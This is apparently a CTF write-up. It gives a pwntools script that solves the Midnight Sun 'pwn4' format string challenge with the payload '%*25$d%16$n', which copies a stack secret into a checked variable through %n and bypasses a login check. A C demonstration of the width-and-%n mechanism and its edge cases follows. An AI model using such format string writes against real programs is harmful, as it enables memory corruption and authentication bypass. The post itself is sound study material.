FSB: printing as many spaces as a value on the stack
2020. 4. 5. 03:27
```python
#!/usr/bin/env python2
# Author: Marco Bonelli - @mebeim
# Date  : 2020-04-04
# Basic idea:
# Copy the secret (4 bytes) from the stack to our guess variable (also on the stack) and pass the check.
#
# %<N>d normally lets us print N characters total (a decimal int padded to N spaces).
# %*25$d lets us choose the value of N from the stack; we choose 25$ -> position of the secret value,
# so this prints a number of chars equal to the secret value.
# %16$n will write the number of printed chars to our variable on the stack (position 16), which is then
# compared with the secret.
#
# This will print *A LOT* of characters back (like 500MB of spaces), but works after trying a few times!

from pwn import *

HOST = 'pwn4-01.play.midnightsunctf.se'
PORT = 10004
EXE  = './pwn4'

if args.REMOTE:
    r = remote(HOST, PORT)
else:
    r = process(EXE)

r.recvuntil("user: ")
r.sendline("%*25$d%16$n")   # width = secret (stack arg 25); %n stores the char count into the guess (stack arg 16)
r.recvuntil("code: ")
r.sendline(str(10))
r.recvuntil("logged: ")
r.clean(10)                 # drain the flood of padding, waiting up to 10 s for it to stop
r.interactive()
```
A format string bug can do this too: the `*` width specifier lets a value on the stack set the field width, and `%n` then writes the number of characters printed into another stack slot, so one stack value is copied into another without ever being leaked back to the attacker.
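The mechanism the script relies on, as an added example that is not part of the original post or of the CTF solution above. Positions 25 and 16 are specific to the pwn4 binary's stack layout, so here the three values are passed to `fprintf` explicitly and the format string uses the fully positional form `%1$*2$d%3$n` (value from argument 1, width from argument 2, `%n` into argument 3). The sample secrets are constructed, and the padding is written to `/dev/null` so a large secret does not flood the terminal.

```c
#include <stdio.h>

/*
 * Models the "%*25$d%16$n" trick with explicit arguments instead of
 * whatever happens to sit on the stack:
 *   arg 1 : the value %d prints (0, a single character)
 *   arg 2 : the "secret", consumed by '*' as the field width
 *   arg 3 : pointer that %n fills with the number of characters emitted
 * Returns the value %n stored, or -1 if /dev/null could not be opened.
 */
int width_copy(int secret)
{
    int guess = -1;
    FILE *sink = fopen("/dev/null", "w");
    if (sink == NULL)
        return -1;
    /* Fully positional: value from arg 1, width from arg 2, count -> arg 3. */
    fprintf(sink, "%1$*2$d%3$n", 0, secret, &guess);
    fclose(sink);
    return guess;
}

/* 1 if the trick reproduces the secret exactly, 0 otherwise. */
int width_copy_matches(int secret)
{
    return width_copy(secret) == secret;
}

int main(void)
{
    /* Constructed sample secrets, not values taken from the challenge. */
    int samples[] = { 4919, 1, 0, -5 };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("secret %6d -> %%n stored %6d (%s)\n", samples[i],
               width_copy(samples[i]),
               width_copy_matches(samples[i]) ? "match" : "MISMATCH");
    return 0;
}
```

The copy is exact only when the secret is a positive width: `%d` always emits at least one character, so a secret of 0 yields a count of 1, and a secret with the top bit set is read as a negative width, which printf treats as the `-` flag plus `|width|`, so the stored count is the absolute value. glibc also refuses to produce more than `INT_MAX` characters from one call, and the real payload mixes a positional width (`*25$`) with an unnumbered `%d` value, which the C standard leaves undefined even though glibc accepted it for this challenge.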